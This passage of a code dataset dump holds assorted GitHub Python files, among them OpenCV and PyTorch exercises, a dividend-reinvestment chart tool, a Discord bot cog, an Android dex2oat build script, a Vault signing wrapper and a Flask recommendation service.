\"normal_units.name\"].values[0]\n","repo_name":"ConMine/ConMine","sub_path":"Development/Code/eol.py","file_name":"eol.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"23400386130","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nos.chdir('C:\\\\Users\\\\sachi\\\\.vscode\\\\GitHubRepos\\\\OSCV_Exercises')\nexetasknum = 1\n\nif exetasknum==1:\n img = cv2.imread('opencv-logo-white.png',0)\n img = cv2.medianBlur(img,5)\n cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,\n param1=50,param2=30,minRadius=0,maxRadius=0)\n # apparently, Param2 changes the number of circles detected\n circles = np.uint16(np.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)\n # draw the center of the circle\n cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)\n\n cv2.imshow('detected circles',cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"sachingadgil/OSCV_Exercises","sub_path":"OpenCV_Python_Tutorials/029 Hough Circle Transform.py","file_name":"029 Hough Circle Transform.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"34427295995","text":"class Solution(object):\n def rearrangeBarcodes(self, barcodes):\n \"\"\"\n :type barcodes: List[int]\n :rtype: List[int]\n \"\"\"\n \n freqs = {}\n for b in barcodes:\n \tif not b in freqs:\n \t\tfreqs[b] = 0\n \tfreqs[b] += 1\n\n max_freq = 0\n for c in freqs:\n \tmax_freq = max_freq(freqs[c], max_freq)\n\n ","repo_name":"MuhammadAbuBakar95/Problem-Solving","sub_path":"two-heaps/rearrangeBarcodes.py","file_name":"rearrangeBarcodes.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"422298693","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nimport altair as alt\n\n\ndef get_data(ticker, start_date, end_date):\n ticker_data = yf.Ticker(ticker)\n df = ticker_data.history(start=start_date, end=end_date).reset_index()[\n [\"Date\", \"Close\", \"Dividends\"]]\n df[\"Close\"] = yf.download(ticker, start_date, end_date)[\"Close\"].values\n return df\n\n\ndef modify_data(initial_investment, df):\n df.loc[0, \"Shares - Not Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n df.loc[0, \"Shares - Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n\n for i in range(len(df) - 1):\n df.loc[i+1, \"Shares - Reinvested\"] = df.loc[i, \"Shares - Reinvested\"] + \\\n (df.loc[i+1, \"Dividends\"] *\n df.loc[i, \"Shares - Reinvested\"]) / df.loc[i+1, \"Close\"]\n df.loc[i+1, \"Shares - Not Reinvested\"] = df.loc[i,\n \"Shares - Not Reinvested\"]\n\n df[\"Value - Reinvested\"] = df[\"Shares - Reinvested\"] * df[\"Close\"]\n df[\"Cash Dividends\"] = (df[\"Shares - Not Reinvested\"]\n * df[\"Dividends\"]).cumsum()\n df[\"Value - Not Reinvested\"] = df[\"Shares - Not Reinvested\"] * \\\n df[\"Close\"] + df[\"Cash Dividends\"]\n\n return df\n\n\ndef get_benchmark(benchmark_ticker, start_date, end_date, initial_investment):\n df = yf.download(benchmark_ticker, start_date, end_date)[\n \"Close\"].reset_index()\n\n df[\"Shares\"] = initial_investment / df.loc[0, \"Close\"]\n df[\"Value\"] = df[\"Shares\"] * df[\"Close\"]\n\n return df\n\n\ndef get_plotting_df(benchmark_df, stock_df, benchmark_ticker):\n reinvested_df = stock_df[[\n \"Date\", \"Value - Reinvested\"]].rename(columns={\"Value - Reinvested\": \"Value\"})\n reinvested_df[\"Case\"] = \"Dividends Reinvested\"\n\n not_reinvested_df = stock_df[[\n \"Date\", \"Value - Not Reinvested\"]].rename(columns={\"Value - Not Reinvested\": \"Value\"})\n not_reinvested_df[\"Case\"] = \"Dividends Not Reinvested\"\n\n benchmark_df[\"Case\"] = benchmark_ticker\n\n plotting_df = pd.concat(\n (reinvested_df, not_reinvested_df, benchmark_df[[\"Date\", \"Value\", \"Case\"]]))\n\n return plotting_df\n\n\ndef get_chart(data):\n hover = alt.selection_single(\n fields=[\"Date\"],\n nearest=True,\n on=\"mouseover\",\n empty=\"none\",\n )\n\n lines = (\n alt.Chart(data, title=\"DRIP Return\")\n .mark_line()\n .encode(\n alt.X(\"Date\", scale=alt.Scale(\n zero=False, nice=False), title=\"Date\"),\n alt.Y(\"Value:Q\", scale=alt.Scale(zero=False)),\n color='Case',\n strokeDash='Case'\n )\n )\n\n points = lines.transform_filter(hover).mark_circle(size=65)\n\n tooltips = (\n alt.Chart(data)\n .mark_rule()\n .encode(\n x=\"Date\",\n y=\"Value:Q\",\n opacity=alt.condition(hover, alt.value(0.3), alt.value(0)),\n tooltip=[\n alt.Tooltip(\"Date\", title=\"Date\"),\n alt.Tooltip(\"Value\", title=\"Value\"),\n alt.Tooltip('Case', title=\"Case\")\n ],\n )\n .add_selection(hover)\n )\n return (lines + points + tooltips).interactive()\n\n\nif __name__ == \"__main__\":\n\n ticker = \"XYLD\"\n benchmark_ticker = \"SPY\"\n\n start_date = datetime.datetime.today() - datetime.timedelta(days=2000)\n end_date = datetime.datetime.today()\n\n df = get_data(ticker, start_date, end_date)\n df = modify_data(10000, df)\n benchmark_df = get_benchmark(benchmark_ticker, start_date, end_date, 10000)\n\n plotting_df = get_plotting_df(benchmark_df, df, benchmark_ticker)\n plotting_df[\"Value\"] = plotting_df[\"Value\"].round(decimals=2)\n\n chart = get_chart(plotting_df)\n\n 
print(chart)\n","repo_name":"victormorizon/financial-superapp","sub_path":"functions/drip_functions.py","file_name":"drip_functions.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
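The `modify_data` loop above boils down to one update per dividend date: new shares = old shares + (dividend per share x old shares) / closing price. A tiny worked example of a single reinvestment step, with made-up numbers:

```python
# One DRIP step: 100 shares, a $0.50/share dividend, reinvested at a $25 close.
shares = 100.0
dividend_per_share = 0.50
close = 25.0

cash = shares * dividend_per_share  # $50.00 paid out
shares += cash / close              # buys 2.0 extra shares
print(shares)                       # 102.0
```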
+{"seq_id":"15429270600","text":"# montecarlo-tf.py\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n@profile\ndef mondecarlo_pi_tf(iteration):\n trials = iteration\n hits = 0\n\n x = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n y = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n\n sess = tf.Session()\n\n with sess.as_default():\n for i in range(1,trials):\n if x.eval()**2 + y.eval()**2 < 1 :\n hits = hits + 1\n\nmondecarlo_pi_tf(10000)\n","repo_name":"mesmerli/tf-example","sub_path":"performance/montecarlo-pi/kernprof/montecarlo-tf.py","file_name":"montecarlo-tf.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"4252035394","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nclass RoleSetup(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n print(\"RoleSetup.py is ready!\")\r\n\r\n @commands.command()\r\n async def setup(self, ctx):\r\n try:\r\n embed_var = discord.Embed(title=\"CHOOSE YOUR ROLES!\", description=\r\n \"\\nReact to this message to assign yourself a role!\\n\"\r\n \"\\n⛏️ mind crafters\\n\"\r\n \"🔫 Valorant Gang\\n\"\r\n \"🐉 DnDers\\n\"\r\n \"🎮 EPIC Fortnite Gamers\\n\"\r\n \"🃏 Pokemon TCG Masters\\n\"\r\n \"🧘♂️ master meditators\\n\"\r\n \"💪 SHREDDED\\n\", color=discord.Color.red())\r\n\r\n await ctx.send(embed=embed_var)\r\n except Exception as e:\r\n print(\"Error:\", e)\r\n\r\nasync def setup(client):\r\n await client.add_cog(RoleSetup(client))\r\n","repo_name":"brielle5810/sk8_bot","sub_path":"RoleSetup.py","file_name":"RoleSetup.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20061477493","text":"def ordered_ints(list_of_objects: list):\n new_list = []\n for i in list_of_objects:\n if i == ():\n new_list.append(int(len(i)))\n else:\n new_list.append(int(i))\n new_list.sort(reverse=True)\n return new_list\n\n\nprint(ordered_ints([1, True, '123', False, 6, ()]))\ndef sum_of_square(n: int):\n if n == 0:\n return 0\n else:\n return n ** 2 + sum_of_square(n - 1)\n\n\nprint(sum_of_square(10))\ndef factorial_of_squares(n: int):\n if n == 1:\n return 1\n else:\n return n ** 2 * factorial_of_squares(n - 1)\n\n\nprint(factorial_of_squares(3))\ndef process_text(text: str):\n first_text = \"\"\n # second_text = \"\"\n for i in text:\n if i == \" \":\n split_text = text.split(\" \", 1)[0]\n first_text = split_text.upper()\n second_text = text.split(\" \", 1)[1]\n\n for i in second_text:\n if (i != i.lower()) or (i == \" \") or (i == i.isnumeric()):\n second_text = second_text.replace(i, '_')\n\n return (first_text, second_text)\n\n\nprint(process_text('1234567a Text to te5t'))","repo_name":"silvisig/pep20g06","sub_path":"modul3/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"21993855134","text":"import logging\n\nimport torch\nfrom torch import nn\nfrom torch.nn import Module\nfrom torchvision import models\n\n\nclass FeaturePredictorModelWrapper:\n\n def __init__(self, model_state_file: str, feature_extraction: bool):\n self.model_state_file = model_state_file\n\n self.model: Module = models.resnet50(pretrained=True)\n classifier_block_features: int = self.model.fc.in_features\n linear_out_features: int = 128\n self.feature_extraction = feature_extraction\n\n if self.feature_extraction:\n self.freeze_layers()\n else:\n logging.info(\"Fine-tuning: Skipping layer freezing\")\n\n self.model.fc = nn.Sequential(\n nn.Linear(in_features=classifier_block_features, out_features=linear_out_features),\n nn.ReLU(),\n nn.Linear(in_features=linear_out_features, out_features=2)\n )\n\n def freeze_layers(self):\n logging.info(\"Freezing base model parameters for feature extraction\")\n for name, parameter in self.model.named_parameters():\n parameter.requires_grad = False\n\n def load_model_from_file(self, device: str) -> None:\n self.model.load_state_dict(torch.load(self.model_state_file))\n self.model = self.model.to(device)\n\n logging.info(\"Model state loaded from {} to device {}\".format(self.model_state_file, device))\n\n def save_model_state(self):\n torch.save(self.model.state_dict(), self.model_state_file)\n logging.info(\"Model state saved at {}\".format(self.model_state_file))\n","repo_name":"cptanalatriste/birds-of-british-empire","sub_path":"featurepred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}
+{"seq_id":"24206245635","text":"import os\nimport sys\nimport subprocess\n\nTMP_FOLDER = \"/tmp/zip_dex_stuff\"\nONHOST_SYSTEM_ROOT=\"/system\"\nORG_BASE_FOLDER = \"/system\"\nDEOAT_BASE_FOLDER = \"./deoat\"\nOUT_BASE_FOLDER = \"./genoat\"\nBAKSMALI_BASE = \"java -jar ./baksmali-2.3.4.jar\"\nDEX2OAT_BASE = \"./bin/dex2oat\" # CHECK\nARCH = [\n\t# (\"arm\", \"krait\"), # Nexus 6\n\t(\"x86_64\", \"x86_64\"), # Emulator\n\t(\"x86\", \"x86\"), # Emulator\n]\nARCH_BOOT_OAT_PATH = {}\n# ARCH_BOOT_CLASS_PATH = {}\n\ndef mkdir(d):\n os.system(\"mkdir -p \" + d)\n\ndef rmall(d):\n os.system(\"rm -rf \" + d)\n\ndef listfiles(d):\n return [f for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))]\n\ndef consolidate(dex_list):\n last_dex_name = None\n curr_dex_files = {}\n all_dex_maps = {}\n # Reverse sorting makes sure that \"xxx.dex\" comes before \"xxx-classesN.dex\"\n # \"__dummy.dex\" helps populate the last mapping\n for dex in sorted(dex_list, reverse=True) + [\"__dummy.dex\"]:\n if dex[-4:] != \".dex\":\n continue\n # print(dex)\n if last_dex_name:\n if dex.startswith(last_dex_name + \"-classes\"):\n curr_dex_files[dex] = dex[dex.rfind(\"-\")+1:]\n elif last_dex_name != dex:\n all_dex_maps[last_dex_name] = curr_dex_files\n # print(last_dex_name, curr_dex_files)\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n else:\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n return all_dex_maps\n\ndef zip_dex(dex_maps, src_dir, dest_dir, suffix):\n for dex_name, dex_mapping in dex_maps.items():\n rmall(TMP_FOLDER)\n mkdir(TMP_FOLDER)\n str_dex_list = \"\"\n for org_dex_name, new_dex_name in dex_mapping.items():\n subprocess.call(\"cp %s/%s %s/%s\" % (src_dir, org_dex_name, TMP_FOLDER, new_dex_name), shell=True)\n str_dex_list += \" \" + new_dex_name\n tmp_path = TMP_FOLDER + \"/\" + dex_name + suffix\n dest_path = dest_dir + \"/\" + dex_name + suffix\n subprocess.call(\"cd \" + TMP_FOLDER + \" && zip -q \" + dex_name + suffix + str_dex_list, shell=True)\n subprocess.call(\"zipalign 4 \" + tmp_path + \" \" + dest_path, shell=True)\n rmall(TMP_FOLDER)\n\nmkdir(OUT_BASE_FOLDER)\n\n\nCOMPONENT, EXT = \"boot\", \".jar\"\nORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\nDEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\nOUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\nREMOTE_BASE_FOLDER = \"/system/framework/\"\nONHOST_BASE_FOLDER = ONHOST_SYSTEM_ROOT + \"/framework\"\n\nrmall(OUT_COMPO_FOLDER)\nmkdir(OUT_COMPO_FOLDER)\n\ndex_list = listfiles(DEOAT_COMPO_FOLDER)\ncons_dex_list = consolidate(dex_list)\nzip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\nfor (arch, arch_variant) in ARCH:\n ORG_ARCH_F = ORG_COMPO_FOLDER + \"/\" + arch + \"/boot.oat\"\n if not os.path.exists(ORG_ARCH_F):\n continue\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n ONHOST_ARCH_FOLDER = ONHOST_BASE_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n OUT_ARCH_F = OUT_ARCH_FOLDER + \"/boot.oat\"\n ONHOST_ARCH_F = ONHOST_ARCH_FOLDER + \"/boot.oat\"\n ARCH_BOOT_OAT_PATH[arch] = ONHOST_BASE_FOLDER + \"/boot.oat\"\n # ARCH_BOOT_CLASS_PATH[arch] = boot_class_path = []\n\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, ORG_ARCH_F), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not 
dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n\n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx64m \"\n \"--image-classes=\" + ONHOST_SYSTEM_ROOT + \"/etc/preloaded-classes \" )\n \n for dex in clean_dex_list:\n # zip_loc = OUT_COMPO_FOLDER + \"/\" + dex\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n # boot_class_path.append(zip_loc)\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER + dex + \" \"\n \n dex2oat_cmd += ( \"--oat-symbols=\" + OUT_ARCH_F[len(OUT_COMPO_FOLDER)+1:-4] + \".sym \"\n \"--oat-file=\" + ONHOST_ARCH_F + \" \"\n \"--oat-location=\" + REMOTE_BASE_FOLDER + arch + \"/boot.oat \"\n \"--image=\" + ONHOST_ARCH_F[:-4] + \".art \"\n \"--base=0x70000000 \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info\" )\n print(dex2oat_cmd)\n os.system(\"rm \" + ONHOST_ARCH_F + \" \" + ONHOST_ARCH_F[:-4] + \".art\")\n subprocess.call(dex2oat_cmd, shell=True)\n os.system(\"cp \" + ONHOST_ARCH_F + \" \" + OUT_ARCH_F)\n os.system(\"cp \" + ONHOST_ARCH_F[:-4] + \".art\" + \" \" + OUT_ARCH_F[:-4] + \".art\")\n # sys.exit(0)\n\nraw_input(\"Press Enter to continue...\")\n\nfor COMPONENT, EXT, REPEAT_NAME in [\n (\"framework\", \".jar\", False),\n (\"app\", \".apk\", True),\n (\"priv-app\", \".apk\", True)\n ]:\n ORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\n DEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\n OUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\n REMOTE_BASE_FOLDER = \"/system/\" + COMPONENT + \"/\"\n\n rmall(OUT_COMPO_FOLDER)\n mkdir(OUT_COMPO_FOLDER)\n\n dex_list = listfiles(DEOAT_COMPO_FOLDER)\n cons_dex_list = consolidate(dex_list)\n zip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\n for (arch, arch_variant) in ARCH:\n ORG_ARCH_FOLDER = ORG_COMPO_FOLDER + \"/\" + arch\n BOOT_ART_PATH = ARCH_BOOT_OAT_PATH[arch][:-4] + \".art\"\n # str_boot_class_path = \":\".join(ARCH_BOOT_CLASS_PATH[arch])\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n\n for odex in listfiles(ORG_ARCH_FOLDER):\n if odex[-5:] != \".odex\":\n continue\n org_odex_path = ORG_ARCH_FOLDER + \"/\" + odex\n # out_odex_path = OUT_ARCH_FOLDER + \"/\" + odex\n out_odex_path = arch + \"/\" + odex\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, org_odex_path), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n \n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx512m \"\n \"--boot-image=\" + BOOT_ART_PATH + \" \" )\n \n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER\n if REPEAT_NAME:\n dex2oat_cmd += dex[:-len(EXT)] + \"/\"\n dex2oat_cmd += dex + \" \"\n\n dex2oat_cmd += ( \"--oat-file=\" + out_odex_path + \" \"\n \"--android-root=\" + 
ONHOST_SYSTEM_ROOT + \" \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info \"\n \"--abort-on-hard-verifier-error\" )\n print(dex2oat_cmd)\n subprocess.call(dex2oat_cmd, shell=True)\n # break\n # break\n","repo_name":"TOLLER-Android/main","sub_path":"agent-build/gen-oat.py","file_name":"gen-oat.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"36"}
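The `consolidate` helper in the record above groups each `foo.dex` with its `foo-classesN.dex` companions and maps them to the `classes.dex` / `classesN.dex` names expected inside the zipped jar or apk; note its keys are the base names without the `.dex` extension. An illustration of the input/output shape, with hypothetical file names (assumes the function above):

```python
dex_files = [
    "Settings.dex",
    "Settings-classes2.dex",
    "Settings-classes3.dex",
    "Phone.dex",
]
print(consolidate(dex_files))
# {'Settings': {'Settings.dex': 'classes.dex',
#               'Settings-classes3.dex': 'classes3.dex',
#               'Settings-classes2.dex': 'classes2.dex'},
#  'Phone': {'Phone.dex': 'classes.dex'}}
```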
+{"seq_id":"42997192151","text":"import os\n\nfrom base64 import (\n b64decode,\n b64encode,\n)\n\nimport hvac\n\nfrom flask import g\n\nfrom cabotage.utils.cert_hacks import construct_cert_from_public_key\n\n\nclass Vault(object):\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n self.vault_url = app.config.get(\"VAULT_URL\", \"http://127.0.0.1:8200\")\n self.vault_verify = app.config.get(\"VAULT_VERIFY\", False)\n self.vault_cert = app.config.get(\"VAULT_CERT\", None)\n self.vault_token = app.config.get(\"VAULT_TOKEN\", None)\n self.vault_token_file = app.config.get(\n \"VAULT_TOKEN_FILE\", os.path.expanduser(\"~/.vault-token\")\n )\n self.vault_token_unwrap = app.config.get(\"VAULT_TOKEN_UNWRAP\", False)\n self.vault_prefix = app.config.get(\"VAULT_PREFIX\", \"secret/cabotage\")\n self.vault_signing_mount = app.config.get(\"VAULT_SIGNING_MOUNT\", \"transit\")\n self.vault_signing_key = app.config.get(\"VAULT_SIGNING_KEY\", \"cabotage-app\")\n\n if self.vault_token is None:\n if os.path.exists(self.vault_token_file):\n with open(self.vault_token_file, \"r\") as vault_token_file:\n self.vault_token = vault_token_file.read().lstrip().rstrip()\n\n # Unwrap!\n # if self.vault_token_unwrap:\n # unwrap_dang_token\n\n app.teardown_appcontext(self.teardown)\n\n def connect_vault(self):\n vault_client = hvac.Client(\n url=self.vault_url,\n token=self.vault_token,\n verify=self.vault_verify,\n cert=self.vault_cert,\n )\n return vault_client\n\n def teardown(self, exception):\n g.pop(\"vault_client\", None)\n\n @property\n def vault_connection(self):\n if \"vault_client\" not in g:\n g.vault_client = self.connect_vault()\n return g.vault_client\n\n @property\n def signing_public_key(self):\n VAULT_TRANSIT_KEY = f\"{self.vault_signing_mount}/keys/{self.vault_signing_key}\"\n key_data = self.vault_connection.read(VAULT_TRANSIT_KEY)\n keys = key_data[\"data\"][\"keys\"]\n latest = str(key_data[\"data\"][\"latest_version\"])\n return keys[latest][\"public_key\"].encode()\n\n @property\n def signing_cert(self):\n return construct_cert_from_public_key(\n self.sign_payload,\n self.signing_public_key,\n \"cabotage-app\",\n )\n\n def sign_payload(self, payload, algorithm=\"sha2-256\", marshaling_algorithm=\"asn1\"):\n if algorithm not in (\"sha2-224\", \"sha2-256\", \"sha2-384\", \"sha2-512\"):\n raise KeyError(f\"Specified algorithm ({algorithm}) not supported!\")\n VAULT_TRANSIT_SIGNING = (\n f\"{self.vault_signing_mount}/sign/{self.vault_signing_key}/{algorithm}\"\n )\n signature_response = self.vault_connection.write(\n VAULT_TRANSIT_SIGNING,\n input=b64encode(payload.encode()).decode(),\n marshaling_algorithm=marshaling_algorithm,\n )\n if marshaling_algorithm == \"jws\":\n return signature_response[\"data\"][\"signature\"].split(\":\")[2]\n signature_encoded = signature_response[\"data\"][\"signature\"].split(\":\")[2]\n return b64decode(signature_encoded)\n","repo_name":"cabotage/cabotage-app","sub_path":"cabotage/server/ext/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"36"}
+{"seq_id":"43606644090","text":"stack=[]\r\ndef stackpush():\r\n item=input(\"Enter your stack item to add : \")\r\n stack.append(item)\r\n print(item,\" has been added to stack\")\r\n\r\ndef stackpop():\r\n item=stack.pop()\r\n print(item,\" has been removed from stack\")\r\n\r\ndef stackview():\r\n print(\"Stack : \", stack)\r\n\r\nchoice_dict={'u':'stackpush','o':'stackpop','v':'stackview'}\r\ndef welcome():\r\n print('''Welcome to stack. Please choose an option(u/o/v/e)\r\n P(u)sh\r\n P(o)p\r\n (V)iew\r\n (E)xit''')\r\n choice=input(\"Enter your option(u/o/v/e) : \")\r\n while True :\r\n if choice not in 'uove' :\r\n print(\"Invalid choice\")\r\n else:\r\n if choice == 'u':\r\n stackpush()\r\n welcome()\r\n elif choice == 'o' :\r\n stackpop()\r\n welcome()\r\n elif choice == 'v' :\r\n stackview()\r\n welcome()\r\n else :\r\n print('Exiting ......')\r\n exit()\r\n\r\n\r\n\r\nwelcome()","repo_name":"Kulamanipradhan0/Python","sub_path":"DataType/List/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"27049414239","text":"import os\nimport json\nimport time\n\nfrom flask import Flask\nfrom pathlib import Path\nimport joblib\n\nfrom google.cloud import storage\n\nGOOGLE_CLOUD_PROJECT = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"local\")\nBUCKET_NAME = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"kz-rec-sys-dev\")\nTMP_MODEL_DIR = Path(os.environ.get(\"TMP_MODEL_DIR\", \"/tmp\"))\n\nif GOOGLE_CLOUD_PROJECT == \"local\":\n service_account_json = str(Path.home() / '.gcp/kz-rec-sys-dev.json')\n storage_client = storage.Client.from_service_account_json(service_account_json)\nelse:\n storage_client = storage.Client()\n\nbucket = storage_client.get_bucket(BUCKET_NAME)\n\napp = Flask(__name__)\n\nmodels = {}\n\norganization_ids = [16655]\nfilenames = [\"model\", \"uuid_cat_id_map\", \"show_cat_id_map\", \"user_items\"]\n\nfor organization_id in organization_ids:\n models[organization_id] = {}\n organization_tmp_dir = TMP_MODEL_DIR / str(organization_id)\n if not organization_tmp_dir.is_dir():\n organization_tmp_dir.mkdir(parents=True)\n\n # ダウンロード\n for filename in filenames:\n gcs_path = f\"{organization_id}/{filename}.pickle\"\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n if not local_path.exists():\n bucket.blob(gcs_path).download_to_filename(local_path)\n\n # joblib load\n for filename in filenames:\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n print(local_path)\n for _ in range(100):\n try:\n models[organization_id][filename] = joblib.load(open(local_path), \"rb\")\n except:\n print(\"error\")\n time.sleep(1)\n else:\n print(\"done\")\n break\n\n@app.route('/')\ndef hello_world():\n target = os.environ.get('TARGET', 'World')\n return 'Hello {}!\\n'.format(target)\n\n@app.route('/rec/')\ndef rec():\n organization_id = 16655\n uuid = '0000019a-f4cd-9a19-6445-58fc330c76db'\n model = models[organization_id]['model']\n user_items = models[organization_id]['user_items']\n uuid_cat_id_map = models[organization_id]['uuid_cat_id_map']\n show_cat_id_map = models[organization_id]['show_cat_id_map']\n recommendations = model.recommend(uuid_cat_id_map[uuid], user_items, N=30, filter_already_liked_items=True)\n rec_fmts = []\n\n for show_cat_code, score in recommendations:\n show_id = show_cat_id_map[show_cat_code]\n\n rec_fmts.append(\n {\"item_id\": show_id, \"score\": float(score)}\n )\n\n return json.dumps(rec_fmts)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"ikedaosushi/sandbox","sub_path":"gcp/gae/gae_rec/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"4139797825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 16:37:46 2019\n\n@author: anup\n\"\"\"\n# =============================================================================\n# Importing Libraries\n# =============================================================================\nimport os\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import transforms\nimport network_01 as nw\nfrom utils_01 import *\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Device :\", device)\n# =============================================================================\n# Defining Parameters\n# =============================================================================\nVERSION = 8\nEPOCHS = 100\nBATCH_SIZE = 8\nLEARNING_RATE = 0.001\nTRAIN_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\nTEST_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\n\ntransformed_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/train_dataset.pkl',\n root_dir = TRAIN_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\n\ntrain_data_loader = data.DataLoader(transformed_dataset, \n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\ntransformed_test_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/test_dataset.pkl',\n root_dir = 